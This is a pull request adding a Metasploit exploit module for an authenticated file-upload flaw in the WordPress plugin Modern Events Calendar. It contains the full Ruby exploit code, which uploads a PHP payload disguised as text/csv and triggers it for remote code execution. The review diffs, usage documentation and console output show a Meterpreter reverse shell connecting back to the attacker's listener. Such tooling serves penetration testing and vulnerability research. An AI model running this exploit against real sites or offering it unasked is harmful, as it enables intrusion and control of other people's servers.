### PR TITLE
[CVE-2021-24145] Wordpress Plugin Modern Events Calendar < 5.16.5 - Authenticated RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/wp_plugin_modern_events_calendar_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_modern_events_calendar_rce.md
@@ -18,7 +18,6 @@ and install it on your Wordpress website through the plugin page : Add New > Upl
 
 ## Verification Steps
 
-List the steps needed to make sure this thing works
 
 1. Start `msfconsole`
 2. `use exploit/multi/http/wp_plugin_modern_events_calendar_rce`

--- a/documentation/modules/exploit/multi/http/wp_plugin_modern_events_calendar_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_modern_events_calendar_rce.md
@@ -1,0 +1,72 @@
+## Vulnerable Application
+
+### Description
+
+This module allows an attacker with a privileged Wordpress account to launch a reverse shell
+due to an arbitrary file upload vulnerability in Wordpress plugin Modern Events Calendar < 5.16.5.
+This is due to an incorrect check of the uploaded file extension.
+Indeed, by using `text/csv` content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin.
+Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/<random_payload_name>.php`
+
+### Installation
+
+You can easily install Wordpress with Docker as explained [there]
+(https://upcloud.com/community/tutorials/wordpress-with-docker/).
+Then, you can download a vulnerable version of Modern Events Calendar plugin from [there]
+(https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip)
+and install it on your Wordpress website through the plugin page : Add New > Upload Plugin > Browse...
+
+## Verification Steps
+
+List the steps needed to make sure this thing works
+
+1. Start `msfconsole`
+2. `use exploit/multi/http/wp_plugin_modern_events_calendar_rce`
+3. `set USERNAME <admin_username>`
+4. `set PASSWORD <admin_password>`
+5. `set TARGETURI <base_path_wordpress>` if the base path of the Wordpress website is different from `/`
+6. `check` to check if the targeted Wordpress website is vulnerable
+7. `run` the module to exploit the vulnerability and start a reverse shell
+
+## Options
+
+### USERNAME
+
+Set the USERNAME of your admin account.
+
+### PASSWORD
+
+Set the PASSWORD of your admin account.
+
+## Scenarios
+
+This module was successfully tested on Debian 10 with Wordpress 5.7.2 and Modern Events Calendar 5.16.2.
+See the following output :
+
+```
+msf6 > use wp_plugin_modern_events_calendar_rce
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(wp_plugin_modern_events_calendar_rce) > set rhost 192.168.1.12
+rhost => 192.168.1.12
+msf6 exploit(wp_plugin_modern_events_calendar_rce) > set username admin
+username => admin
+msf6 exploit(wp_plugin_modern_events_calendar_rce) > set password my_best_password
+password => my_best_password
+msf6 exploit(wp_plugin_modern_events_calendar_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.35:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Uploading file 'wkook.php' containing the payload...
+[*] Triggering the payload ...
+[*] Sending stage (39282 bytes) to 192.168.1.12
+[*] Meterpreter session 10 opened (192.168.1.35:4444 -> 192.168.1.12:34400) at 2021-07-12 14:20:43 +0200
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo 
+Computer    : 66dd7f594749
+OS          : Linux 66dd7f594749 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
+Meterpreter : php/linux
+meterpreter > 
+```

--- a/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
@@ -60,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    datastore['WPCHECK'] = true
     unless wordpress_and_online?
       fail_with(Failure::Unreachable, 'Server not online or not detected as wordpress')
     end

--- a/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if cookie
       check_plugin_version_from_readme('modern-events-calendar-lite', '5.16.5')
     else
-      CheckCode::Unknown('The admin credentials given are wrong !')
+      CheckCode::Detected('The admin credentials given are wrong !')
     end
   end
 

--- a/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
@@ -1,0 +1,113 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution',
+        'Description' => %q{
+          This module allows an attacker with a privileged Wordpress account to launch a reverse shell
+          due to an arbitrary file upload vulnerability in Wordpress plugin Modern Events Calendar < 5.16.5.
+          This is due to an incorrect check of the uploaded file extension.
+          Indeed, by using `text/csv` content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin.
+          Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/<random_payload_name>.php`
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Nguyen Van Khanh', # Original PoC and discovery
+            'RON JOST', # Exploit-db
+            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+          ],
+        'References' =>
+          [
+            ['EDB', '50115'],
+            ['CVE', '2021-24347'],
+            ['CWE', '434']
+          ],
+        'Platform' => [ 'php' ],
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+        [
+          [ 'Wordpress Modern Events Calendar < 5.16.5', {}]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2021-01-29',
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
+      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
+    ]
+  end
+
+  def check
+    datastore['WPCHECK'] = true
+    unless wordpress_and_online?
+      fail_with(Failure::Unreachable, 'Server not online or not detected as wordpress')
+    end
+
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    if cookie
+      check_plugin_version_from_readme('modern-events-calendar-lite', '5.16.5')
+    else
+      CheckCode::Unknown('The admin credentials given are wrong !')
+    end
+  end
+
+  def exploit
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    fail_with(Failure::UnexpectedReply, 'Authentication failed') unless cookie
+    payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.php"
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(payload.encoded, 'text/csv', nil, "form-data; name='feed'; filename='#{payload_name}'")
+    post_data.add_part('import-start-bookings', nil, nil, "form-data; name='mec-ix-action'")
+
+    print_status("Uploading file \'#{payload_name}\' containing the payload...")
+
+    r = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php?page=MEC-ix&tab=MEC-import'),
+      'headers' => {
+        'Origin' => full_uri('')
+      },
+      'cookie' => cookie,
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    )
+
+    if r&.code == 200
+
+      print_status('Triggering the payload ...')
+      send_request_cgi(
+        'method' => 'GET',
+        'headers' => {
+          'Origin' => full_uri('')
+        },
+        'cookie' => cookie,
+        'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/#{payload_name}")
+      )
+    else
+      fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file")
+    end
+  end
+end

--- a/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
@@ -95,19 +95,16 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
     )
 
-    if r&.code == 200
+    fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 200
 
-      print_status('Triggering the payload ...')
-      send_request_cgi(
-        'method' => 'GET',
-        'headers' => {
-          'Origin' => full_uri('')
-        },
-        'cookie' => cookie,
-        'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/#{payload_name}")
-      )
-    else
-      fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file")
-    end
+    print_status('Triggering the payload ...')
+    send_request_cgi(
+      'method' => 'GET',
+      'headers' => {
+        'Origin' => full_uri('')
+      },
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/#{payload_name}")
+    )
   end
 end

--- a/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           [ 'Wordpress Modern Events Calendar < 5.16.5', {}]
         ],
-        'Privileged' => true,
+        'Privileged' => false,
         'DisclosureDate' => '2021-01-29',
         'Notes' =>
           {

--- a/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' =>
           [
             ['EDB', '50115'],
-            ['CVE', '2021-24347'],
+            ['CVE', '2021-24145'],
             ['CWE', '434']
           ],
         'Platform' => [ 'php' ],

--- a/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -89,12 +90,17 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => {
         'Origin' => full_uri('')
       },
+      'vars_get' => {
+        'page' => 'MEC-ix',
+        'tab' => 'MEC-import'
+      },
       'cookie' => cookie,
       'data' => post_data.to_s,
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
     )
 
     fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 200
+    register_file_for_cleanup(payload_name)
 
     print_status('Triggering the payload ...')
     send_request_cgi(

--- a/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
-    fail_with(Failure::UnexpectedReply, 'Authentication failed') unless cookie
+    fail_with(Failure::NoAccess, 'Authentication failed') unless cookie
     payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.php"
 
     post_data = Rex::MIME::Message.new

--- a/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     unless wordpress_and_online?
-      fail_with(Failure::Unreachable, 'Server not online or not detected as wordpress')
+     return CheckCode::Safe('Server not online or not detected as Wordpress')
     end
 
     cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])

--- a/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_modern_events_calendar_rce.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     r = send_request_cgi(
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php?page=MEC-ix&tab=MEC-import'),
+      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
       'headers' => {
         'Origin' => full_uri('')
       },


### PR DESCRIPTION
## Vulnerable Application

### Description

This module allows an attacker with a privileged Wordpress account to launch a reverse shell
due to an arbitrary file upload vulnerability in Wordpress plugin Modern Events Calendar < 5.16.5.
This is due to an incorrect check of the uploaded file extension.
Indeed, by using `text/csv` content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin.
Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/<random_payload_name>.php`

### Installation

You can easily install Wordpress with Docker as explained [there]
(https://upcloud.com/community/tutorials/wordpress-with-docker/).
Then, you can download a vulnerable version of Modern Events Calendar plugin from [there]
(https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip)
and install it on your Wordpress website through the plugin page : Add New > Upload Plugin > Browse...

## Verification Steps

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. `use exploit/multi/http/wp_plugin_modern_events_calendar_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_wordpress>` if the base path of the Wordpress website is different from `/`
6. `check` to check if the targeted Wordpress website is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell

## Options

### USERNAME

Set the USERNAME of your admin account.

### PASSWORD

Set the PASSWORD of your admin account.

## Scenarios

This module was successfully tested on Debian 10 with Wordpress 5.7.2 and Modern Events Calendar 5.16.2.
See the following output :

```
msf6 > use wp_plugin_modern_events_calendar_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(wp_plugin_modern_events_calendar_rce) > set rhost 192.168.1.12
rhost => 192.168.1.12
msf6 exploit(wp_plugin_modern_events_calendar_rce) > set username admin
username => admin
msf6 exploit(wp_plugin_modern_events_calendar_rce) > set password my_best_password
password => my_best_password
msf6 exploit(wp_plugin_modern_events_calendar_rce) > run

[*] Started reverse TCP handler on 192.168.1.35:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading file 'wkook.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 192.168.1.12
[*] Meterpreter session 10 opened (192.168.1.35:4444 -> 192.168.1.12:34400) at 2021-07-12 14:20:43 +0200

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo 
Computer    : 66dd7f594749
OS          : Linux 66dd7f594749 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
Meterpreter : php/linux
meterpreter > 
```
